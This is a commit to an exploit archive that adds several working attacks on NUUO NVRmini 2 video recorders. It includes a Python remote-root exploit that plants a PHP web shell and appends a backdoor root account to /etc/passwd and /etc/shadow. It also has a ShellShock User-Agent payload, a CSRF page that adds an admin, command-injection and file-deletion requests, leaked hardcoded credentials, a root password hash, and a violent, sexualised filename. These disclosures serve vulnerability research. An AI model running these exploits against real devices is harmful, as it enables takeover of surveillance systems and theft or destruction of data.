DB: 2016-08-07

8 new exploits

Kodi Web Server 16.1 - Denial of Service
NUUO NVRmini 2 3.0.8 - Remote Root Exploit
NUUO NVRmini 2 3.0.8 - (Add Admin) CSRF
NUUO NVRmini 2 3.0.8 - Local File Disclosure
NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection
NUUO NVRmini 2 3.0.8 - ShellShock Remote Code Execution
NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion
NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access
This commit is contained in:
Offensive Security 2016-08-07 05:06:35 +00:00
parent 428f25fc1c
commit e161127711
9 changed files with 1125 additions and 0 deletions

View file

@ -36356,3 +36356,11 @@ id,file,description,date,author,platform,type,port
40205,platforms/cgi/webapps/40205.txt,"Davolink DV-2051 - Multiple Vulnerabilities",2016-08-05,"Eric Flokstra",cgi,webapps,80
40206,platforms/php/webapps/40206.txt,"WordPress Count per Day Plugin 3.5.4 - Stored Cross-Site Scripting",2016-08-05,"Julien Rentrop",php,webapps,80
40207,platforms/hardware/webapps/40207.txt,"NASdeluxe NDL-2400r 2.01.09 - OS Command Injection",2016-08-05,"SySS GmbH",hardware,webapps,80
40208,platforms/windows/dos/40208.py,"Kodi Web Server 16.1 - Denial of Service",2016-08-05,"Guillaume Kaddouch",windows,dos,8080
40209,platforms/php/webapps/40209.py,"NUUO NVRmini 2 3.0.8 - Remote Root Exploit",2016-08-06,LiquidWorm,php,webapps,80
40210,platforms/php/webapps/40210.html,"NUUO NVRmini 2 3.0.8 - (Add Admin) CSRF",2016-08-06,LiquidWorm,php,webapps,80
40211,platforms/php/webapps/40211.txt,"NUUO NVRmini 2 3.0.8 - Local File Disclosure",2016-08-06,LiquidWorm,php,webapps,80
40212,platforms/php/webapps/40212.txt,"NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection",2016-08-06,LiquidWorm,php,webapps,80
40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - ShellShock Remote Code Execution",2016-08-06,LiquidWorm,cgi,webapps,80
40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80
40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80

Can't render this file because it is too large.

91
platforms/cgi/webapps/40213.txt Executable file
View file

@ -0,0 +1,91 @@
NUUO NVRmini 2 NE-4160 ShellShock Remote Code Execution
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: Firmware Version: 02.02.00
NVR Version: 02.02.0000.0040
Device Pack Version: 04.07.0000.0030
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: NUUO NVRmini, NVRmini2, Crystal, NVRSolo suffers from authenticated ShellShock
vulnerability. This could allow an attacker to gain control over a targeted computer
if exploited successfully. The vulnerability affects Bash, a common component known
as a shell that appears in many versions of Linux and Unix.
Tested on: GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5352
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5352.php
14.01.2016
--
POST /cgi-bin/cgi_system HTTP/1.1
Host: 10.0.0.17
Content-Length: 91
Origin: http://10.0.0.17
X-Requested-With: XMLHttpRequest
User-Agent: () { :;}; /bin/ls -al
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://10.0.0.17/protocol_ftp.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en
Connection: close
cmd=ftp_setup&act=modify&com_port=21&pasv_port_from=1024&pasv_port_to=65535&services=enable
Response:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 15 Jan 2016 13:09:11 GMT
Server: lighttpd/1.4.28
Content-Length: 1652
drwxr-xr-x 3 root root 402 Oct 20 2014 .
drwxr-xr-x 6 root root 1024 Jan 4 22:49 ..
-rwxr-xr-x 1 root root 256564 Oct 20 2014 DaylightSavingWatcher
-rwxr-xr-x 1 root root 51376 Oct 20 2014 NuDatTool
-rwxr-xr-x 1 root root 60500 Oct 20 2014 NuDiscovery
-rwxr-xr-x 1 root root 930652 Oct 20 2014 NuHWMgn
-rwxr-xr-x 1 root root 8236 Oct 20 2014 NuNICWatcher
-rwxr-xr-x 1 root root 309 Oct 20 2014 after_mount.sh
lrwxrwxrwx 1 root root 7 Oct 20 2014 archive_mrg_mv -> lite_mv
-rwxr-xr-x 1 root root 1114844 Oct 20 2014 auto_upgrade
lrwxrwxrwx 1 root root 7 Oct 20 2014 cgi_main -> lite_mv
-rwxr-xr-x 1 root root 576992 Oct 20 2014 cgi_system
lrwxrwxrwx 1 root root 7 Oct 20 2014 ddns_update -> lite_mv
-rwxr-xr-x 1 root root 570 Oct 20 2014 getdhcpip.sh
-rwxr-xr-x 1 root root 388 Oct 20 2014 halt
drwxr-xr-x 2 root root 41 Oct 20 2014 lib
-rwxr-xr-x 1 root root 3827188 Oct 20 2014 lite_mv
-rwxr-xr-x 1 root root 15396 Oct 20 2014 nagent_mv
-rwxr-xr-x 1 root root 9836 Oct 20 2014 nu_btns
-rwxr-xr-x 1 root root 3496 Oct 20 2014 nudaemon
-rwxr-xr-x 1 root root 10616 Oct 20 2014 nufancontrol
-rwxr-xr-x 1 root root 12772 Oct 20 2014 nuklogd
-rwxr-xr-x 1 root root 392 Oct 20 2014 reboot
-rwxr-xr-x 1 root root 13144 Oct 20 2014 thwstat
FTP Setup OK

163
platforms/php/webapps/40209.py Executable file
View file

@ -0,0 +1,163 @@
#!/usr/bin/env python
#
#
# NUUO Remote Root Exploit
#
#
# Vendor: NUUO Inc.
# Product web page: http://www.nuuo.com
# Affected version: <=3.0.8
#
# Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
# functionality. Setup is simple and easy, with automatic port forwarding
# settings built in. NVRmini 2 supports POS integration, making this the perfect
# solution for small retail chain stores. NVRmini 2 also comes full equipped as
# a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
# and RAID functions for data protection. Choose NVR and know that your valuable video
# data is safe, always.
#
# Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffers from an unauthenticated command
# injection vulnerability. Due to an undocumented and hidden debugging script, an attacker
# can inject and execute arbitrary code as the root user via the 'log' GET parameter in the
# '__debugging_center_utils___.php' script.
#
# -----------------------------------------------------
# $ nuuo.py 10.0.0.17 80
# [*] ==============================================
# [*] NUUO NVR/DVR/NDVR Remote Root Exploit
# [*] Zero Science Lab - http://www.zeroscience.mk
# [*] ==============================================
# [*] Backdoor detected!
# [*] Add root user (y/n)? n
# [*] Press [ ENTER ] to start root shell...
#
# root@nuuo:~# id
# uid=0(root) gid=0(root)
#
# root@nuuo:~# exit
#
# [*] Removing raidh.php file
# [*] Session terminated!
#
# $
# -----------------------------------------------------
#
# Tested on: GNU/Linux 3.0.8 (armv7l)
# GNU/Linux 2.6.31.8 (armv5tel)
# lighttpd/1.4.28
# PHP/5.5.3
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2016-5348
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5348.php
# NSE Script: http://www.zeroscience.mk/codes/nuuo-backdoor.nse
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40209.zip
#
#
# 14.01.2016
#
import os######
import sys#####
import time####
import urllib##
import binascii
import requests
__author__ = 'lqwrm'
def persist(host,port,hexy,clean):
pwd = '''echo 'roOt:x:0:0:PWNED account:/:/bin/bash' >> /etc/passwd'''
sdw = '''echo 'roOt:$1$MJOnV/Y3$tDnMIBMy0lEQ2kDpfgTJP0:16914:0:99999:7:::' >> /etc/shadow'''
print '[*] Adding user \'roOt\' with password \'rewt\' in passwd file.'
requests.get('http://'+host+':'+port+'/raidh.php?cmd='+pwd)
time.sleep(2)
print '[*] Updating shadow file.'
requests.get('http://'+host+':'+port+'/raidh.php?cmd='+sdw)
time.sleep(2)
print '[*] Shell awaits: ssh roOt@'+host
requests.get('http://'+host+':'+port+'/raidh.php?cmd='+urllib.quote(clean))
exit(0)
def check(host,port,hexy):
try:
r = requests.get('http://'+host+':'+port+'/'+hexy, allow_redirects=False)
if r.status_code == 200:
print '[*] Backdoor detected!'
pass
else:
print '[*] No backdoors here. :('
exit(0)
except Exception:
print '[*] Could not connect.'
exit(0)
def main():
print '[*] =============================================='
print '[*] NUUO NVR/DVR/NDVR Remote Root Exploit'
print '[*] Zero Science Lab - http://www.zeroscience.mk'
print '[*] =============================================='
if (len(sys.argv) <= 2):
print '[*] Usage: nuuo.py <ipaddress> <port>'
exit(0)
host = sys.argv[1]
port = sys.argv[2]
dbgcu = '5f5f64'#
dbgcu+= '656275'#
dbgcu+= '676769'#
dbgcu+= '6e675f'#
dbgcu+= '63656e'#
dbgcu+= '746572'#
dbgcu+= '5f7574'#
dbgcu+= '696c73'#
dbgcu+= '5f5f5f'#
dbgcu+= '2e7068'#
dbgcu+= '70'###'#
hexy = binascii.unhexlify(dbgcu)
check (host,port,hexy)
payload = '''echo "<?php system(\$_REQUEST[\'cmd\']); ?>" > raidh.php'''
requests.get('http://'+host+':'+port+'/'+hexy+'?log=1337;' + payload)
clean = 'rm raidh.php'
a1 = raw_input('[*] Add root user (y/n)? ')
if a1.strip() == 'y' or a1.strip() == 'Y':
persist (host,port,hexy,clean)
else:
pass
print '[*] Press [ ENTER ] to start root shell...'
raw_input()
while True:
try:
cmd = raw_input('root@nuuo:~# ')
if cmd.strip() == '':
print '[*] Give me a command!\n'
continue
else:
e = requests.get('http://'+host+':'+port+'/raidh.php?cmd='+urllib.quote(cmd))
print e.text
if cmd.strip() == 'exit':
print '[*] Removing raidh.php file'
requests.get('http://'+host+':'+port+'/raidh.php?cmd='+urllib.quote(clean))
print '[*] Session terminated!'
break
except Exception:
break
if __name__ == "__main__":
main()

View file

@ -0,0 +1,66 @@
<!--
NUUO CSRF Add Admin Exploit
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040)
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: The application interface allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. This can be
exploited to perform certain actions with administrative privileges if a logged-in
user visits a malicious web site.
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5349
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5349.php
14.01.2016
-->
<!-- 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -->
<html>
<body>
<form action="http://10.0.0.17/users_xml.php">
<input type="hidden" name="&#95;password2" value="admin" />
<input type="hidden" name="addusername" value="csrfadmin" />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="cmd" value="adduser" />
<input type="hidden" name="group" value="poweruser" />
<input type="hidden" name="displaygroup" value="power&#32;user" />
<input type="hidden" name="magic" value="574" />
<input type="hidden" name="liveacc" value="1&#44;2&#44;3&#44;4&#44;5&#44;6&#44;7&#44;8&#44;9&#44;10&#44;11&#44;12&#44;13&#44;14&#44;15&#44;16" />
<input type="hidden" name="pbacc" value="1&#44;2&#44;3&#44;4&#44;5&#44;6&#44;7&#44;8&#44;9&#44;10&#44;11&#44;12&#44;13&#44;14&#44;15&#44;16" />
<input type="hidden" name="ptzacc" value="1" />
<input type="hidden" name="ioacc" value="1" />
<input type="hidden" name="backupacc" value="1" />
<input type="hidden" name="deleteacc" value="1" />
<input type="hidden" name="emapeacc" value="1" />
<input type="hidden" name="remotalkacc" value="1" />
<input type="hidden" name="logacc" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

154
platforms/php/webapps/40211.txt Executable file
View file

@ -0,0 +1,154 @@
NUUO Local File Disclosure Vulnerability
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040)
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffers from a file disclosure
vulnerability when input passed thru the 'css' parameter to 'css_parser.php' script
is not properly verified before being used to include files. This can be exploited
to disclose contents of files from local resources.
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5350
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5350.php
14.01.2016
--
Request:
--------
GET http://10.0.0.17/css_parser.php?css=__nvr_dat_tool___.php HTTP/1.1
Response:
---------
<?php
include('utils.php');
header("Expires: Thu, 19 Nov 1981 08:52:00 GMT");
header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0");
header("Pragma: no-cache");
session_start();
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>DatTool</title>
</head>
<body>
<?php
if (isset($_POST) && isset($_POST['username']) && isset($_POST['password']))
{
if ($_POST['username'] != 'nuuoeng' || $_POST['password'] != 'qwe23622260')
{
exit(0);
}
if (isset($_POST['act']) && $_POST['act'] == 'checkdat')
{
echo '<script language="javascript">';
echo 'alert("The system will start to repair videos right after system reboot. Please go to Setting Page to reboot system manually.")';
echo '</script>';
touch(constant("FLASH_FOLDER")."/checkdat");
}
?>
<p>Click the Repair button to repair the recorded videos became black due to incorrect video format. It may take a long time to repair videos, which depends on the amount of video files.</p>
<form method="POST" action="<?php echo $_SERVER['PHP_SELF']; ?>" name="form0">
<input type="hidden" name="username" value="<?php echo $_POST['username']; ?>">
<input type="hidden" name="password" value="<?php echo htmlspecialchars( $_POST['password'] ); ?>">
<input type="hidden" name="act" value="checkdat">
<input type="submit" value="Repair" name="submit" >
</form>
<?php
}
else
{
?>
<form method="POST" action="<?php echo $_SERVER['PHP_SELF']; ?>" name="form0">
Usermame: <input type="text" size="15" name="username" value=""><br />
Password: <input type="password" size="15" name="password" value=""><br />
<input type="submit" value="Submit" name="submit" >
</form>
<?php
}
?>
</body>
</html>
============================================================================
Request:
--------
GET http://10.0.0.17/css_parser.php?css=css_parser.php HTTP/1.1
Response:
---------
<?php
if(!isset($_GET['css']))exit('/* please supply a "css" parameter */');
$filename=$_GET['css'];
if(strpos($filename,'..')!==false)exit('/* please use an absolute address for your css */');
$filename=$_SERVER['DOCUMENT_ROOT'].'/'.$filename;
if(!file_exists($filename))exit('/* referred css file does not exist */');
header('content-type:text/css');
header("Expires: ".gmdate("D, d M Y H:i:s", (time()+900)) . " GMT");
$matches=array();
$names=array();
$values=array();
$file=file_get_contents($filename);
foreach ($_GET as $key=>$value)
{
//echo "Key: $key; Value: $value <br/>\n ";
if ($key != 'css')
{
$file = str_replace($key,$value,$file);
}
//system("echo \"Key: $key; Value: $value <br/>\n \" >> $filename");
}
echo $file;
/*
foreach(array_reverse($matches[0]) as $match){
$match=preg_replace('/\s+/',' ',rtrim(ltrim($match)));
$names[]=preg_replace('/\s.*//*','',$match);
$values[]=preg_replace('/^[^\s]*\s/','',$match);
}
*/
?>

127
platforms/php/webapps/40212.txt Executable file
View file

@ -0,0 +1,127 @@
NUUO Multiple OS Command Injection Vulnerabilities
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040, NT-4040(R))
DP: <=04.07.0000.0030, <=04.03.0000.0035
FW: <=02.02.00, <=1.7.0
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
NUUO Titan NVR is NUUO's Linux-based open platform recording solution. It is built
on Linux Foundation, with cross-platform Windows and MAC client software. It supports
up to 64 channels of megapixel recording with 250 Mbps throughput. It also comes with
a myriads of features that will sure to fulfill even the most demanding projects. Supports
over 2300 camera models from over 100 vendors.
Desc: NUUO NVRmini, NVRmini2, Crystal, NVRSolo and NVRTitan suffers from multiple
authenticated OS command injection vulnerabilities. This can be exploited to inject
and execute arbitrary shell commands as the root user.
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
lighttpd/1.4.35
PHP/5.5.3
PHP/5.6.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5351
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5351.php
14.01.2016
--
NVRTitan:
POST /handle_iscsi.php HTTP/1.1
Host: 10.0.0.17
Content-Length: x
Origin: http://10.0.0.17
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://10.0.0.17/iscsi.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=c9fdced9e8129eb4c14e3154cd0e0ce3; lang=en; loginName=admin
Connection: close
act=discover&address=1.1.1.1|echo%20pwn&port=3260
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Connection: close
Date: Mon, 18 Apr 2016 08:52:17 GMT
Server: lighttpd/1.4.35
Content-Length: x
pwn
============================================================
NVRmini/2/Solo/Crystal:
GET /cgi-bin/cgi_system?cmd=raid_setup&act=getsmartinfo&devname=|ping%20-n%200%20localhost&rand=1452765315144 HTTP/1.1
Host: 10.0.0.17
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: */*
Referer: http://10.0.0.17/raid.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en
Connection: close
---
POST /cgi-bin/cgi_system?cmd=saveconfig HTTP/1.1
Host: 10.0.0.17
Content-Length: 97
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://10.0.0.17
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://10.0.0.17/save_config.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en
Connection: close
bfolder=%2Fmtd%2Fblock3&bfile=|ping%20-n%200%20localhost&inc_emap=no&inc_pos=no
---
Sample session from commix:
Shell > whoami
root
Shell > ls
Default.ini EMap PatrolOpt003.xml PatrolOpt009.xml PatrolOpt015.xml access apcupsd authority.lic auto_upgrade.ini autoarchive.ini camera.ini cameraparam.ini cmsserver.ini cmsstat daylightsaving.ini ddns.ini dualstreaming.ini email.ini eventaction.ini ezNUUO iobox.ini lenssetting.ini lighttpd-inc.conf lighttpd.conf liveserver.ini notice.ini nuservice.conf pos proftpd-inc.conf pushnotification raid_info.xml recordingmode.ini schedule.ini scheduler_dio.ini scheduler_motion.ini smb-inc.conf version.xml

67
platforms/php/webapps/40214.txt Executable file
View file

@ -0,0 +1,67 @@

NUUO Arbitrary File Deletion Vulnerability
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: Input passed to the 'filename' parameter in 'deletefile.php' is not properly
sanitised before being used to delete files. This can be exploited to delete files
with the permissions of the web server using their absolute path or via directory
traversal sequences passed within the affected POST/GET parameter.
==================================================================
/deletefile.php:
----------------
1: <?php
2: $filename=$_POST['filename'];
3: unlink($filename);
4: if (file_exists($filename))
5: echo "fail";
6: else echo "true";
7: ?>
==================================================================
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5353
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5353.php
14.01.2016
--
POST /deletefile.php HTTP/1.1
Host: 10.0.0.17
Content-Length: x
Origin: http://10.0.0.17
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close
filename=He_molested_murdered_and_mutilated_her.mp4

395
platforms/php/webapps/40215.txt Executable file
View file

@ -0,0 +1,395 @@

NUUO Backdoor (strong_user.php) Remote Shell Access
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040)
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo devices have a hidden PHP script
that when called, a backdoor user is created with poweruser privileges that is able
to read and write files on the affected device. The backdoor user 'bbb' when created
with the password '111111' by visiting 'strong_user.php' script is able to initiate a
secure shell session and further steal and/or destroy sensitive information.
==================================================================
/strong_user.php:
-------------------------------
<?php
class ReadPasswd{
private $file;
private $fileData;
private $error;
function __construct($file) {
try{
if (is_file($file))
{
$this->fileData = file($file);
$this->file = $file;
}
else
{
throw new Exception("Couldnt open file.");
}
} catch (Exception $e) {
$this->error[] = $e->getMessage();
}
}
public function getAllHTML(){
foreach ($this->fileData as $content)
{
$temp = explode(':', $content);
$output .= "<b>Username: {$temp[0]} </b><br />";
$output .= "Validation: {$temp[1]} <br />";
$output .= "User Identifier: {$temp[2]} <br />";
$output .= "Group Identifier: {$temp[3]} <br />";
$output .= "Gecos Field: {$temp[4]} <br />";
$output .= "Home Directory: {$temp[5]} <br />";
$output .= "Shell: {$temp[6]} <br />";
$output .= "<br />";
}
return $output;
}
public function getAllCLI() {
foreach ($this->fileData as $content)
{
$temp = explode(':', $content);
$output .= "Username: {$temp[0]} n";
$output .= "Validation: {$temp[1]} n";
$output .= "User Identifier: {$temp[2]} n";
$output .= "Group Identifier: {$temp[3]} n";
$output .= "Gecos Field: {$temp[4]} n";
$output .= "Home Directory: {$temp[5]} n";
$output .= "Shell: {$temp[6]} n";
$output .= "n";
}
return $output;
}
public function searchUser($user,$data=0) {
try{
$data = array();
if (is_string($user))
{
foreach($this->fileData as $line)
{
$temp = explode(':', $line);
if (in_array($user,$temp))
{
if ($data) return 1;
$data['username'] = $temp[0];
$data['validation'] = $temp[1];
$data['user_identifier'] = $temp[2];
$data['group_identifier'] = $temp[3];
$data['gecos'] = $temp[4];
$data['home_directory'] = $temp[5];
$data['shell'] = $temp[6];
}
}
}
else
{
throw new Exception('A search error has occured.');
}
} catch (Exception $e) {
$this->error[] = $e->getMessage();
}
return $data;
}
public function getError() {
return $this->error;
}
public function deleteUser($user) {
try{
if ($this->searchUser($user,1))
{
foreach ($this->fileData as $line)
{
$lines = explode(":",$line);
if (!in_array($user,$lines))
{
$final .= $line;
}
}
if(!file_put_contents($this->file,$final))
{
throw new Exception("Could not delete user.");
}
}
else
{
throw new Exception("User doesnt exist.");
}
} catch (Exception $e) {
echo $this->error[] = $e->getMessage();
}
}
}
/*
echo "Strong test ";
ma_getuser();
ma_getgroup();
$result = array('users' => array(), 'groups' => array());
echo "<br>";
echo $maUser;
echo "<br>";
echo $maGroup;
echo "<br>";
foreach($maGroup as $key =>$value)
{
$tmp = array();
$tmp['groupname'] = $maGroup[$key]->strGroupname;
$tmp['members'] = array();
echo "Group (" . $key . ") === " . $maGroup[$key]->strGroupname;
echo "<br><br>";
ma_getgroupmember($maGroup[$key]->strGroupname);
foreach ($maGroupmember as $mKey => $mValue)
{
echo " User ($mKey) ===> $mValue ";
echo "<br>";
array_push($tmp['members'], $maGroupmember[$mKey]->strUsername);
}
//foreach($value as $userkey => $uservalue)
//{
// echo " User ($userkey) ===> $uservalue ";
// echo "<br>";
//}
echo "<br>";
echo implode(",", $tmp['members']);
echo "<br>";
$tmp['membersStr'] = implode(",", $tmp['members']);
array_push($result['groups'], $tmp);
}
echo "<h1> Other </h1>";
$tmp = array();
$tmp['groupname'] = 'admin';
ma_getgroupmember($tmp['groupname']);
//ma_getgroupmember('');
$tmp['members'] = array();
foreach ($maGroupmember as $mKey => $mValue)
{
array_push($tmp['members'], $maGroupmember[$mKey]->strUsername);
echo $maGroupmember[$mKey]->strUsername . "<br>";
}
$tmp['membersStr'] = implode(",", $tmp['members']);
array_push($result['groups'], $tmp);
echo "<h1> USER </h1>";
foreach ( $maUser as $key => $value)
{
$tmp = array();
$tmp['username'] = $maUser[$key]->strUsername;
$tmp['groups'] = array();
foreach ($result['groups'] as $gKey => $gValue)
{
if (in_array($tmp['username'], $gValue['members']))
array_push($tmp['groups'], $gValue['groupname']);
}
$tmp['groupsStr'] = implode(",", $tmp['groups']);
echo $tmp['username'] . "<br>";
echo $tmp['groupsStr'] . "<br>";
array_push($result['users'], $tmp);
}
*/
echo "<h1> Read Passwd </h1>";
$passclass = new ReadPasswd('/etc/passwd');
echo $passclass->getAllHTML();
echo "<h1> add user </h1>";
//$output = system("adduser bbb -G poweruser -s /sbin/nologin -D -H; passwd bbb 111111");
//$output = system("adduser bbb -G poweruser -s /sbin/nologin -D -H");
$output = system("adduser bbb -G poweruser -D ");
/*
$f = popen ("/usr/bin/passwd bbb","r");
$read = fread($f, 1024);
$out = fwrite($f,"111111\n");
echo $read . " read 111 ,,, $out <br>";
$read = fread($f, 1024);
$out = fwrite($f,"111111\n");
echo $read . " read 222 ,,, $out <br>";
pclose($f);
//echo $output . " kkk <br>";
*/
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w") // stdout is a pipe that the child will write to
);
$process = proc_open('/usr/bin/passwd bbb', $descriptorspec, $pipes);
if (is_resource($process))
{
$read = fread($pipes[1], 1024);
$out = fwrite($pipes[0],"111111\n");
echo $read . " read 111 ,,, $out <br>";
$read = fread($pipes[1], 1024);
$out = fwrite($pipes[0],"111111\n");
echo $read . " read 111 ,,, $out <br>";
fclose($pipes[0]);
fclose($pipes[1]);
}
proc_close($process);
//$handle = popen("/bin/ls", "r");
//$read = fread($handle, 1024);
//echo $read;
//pclose($handle);
?>
==================================================================
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5354
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5354.php
14.01.2016
--
#1
Read of /etc/shadow file before backdoor was enabled:
------------------------------------------------------
root@nuuo:~# cat /etc/shadow
#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7:::
root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
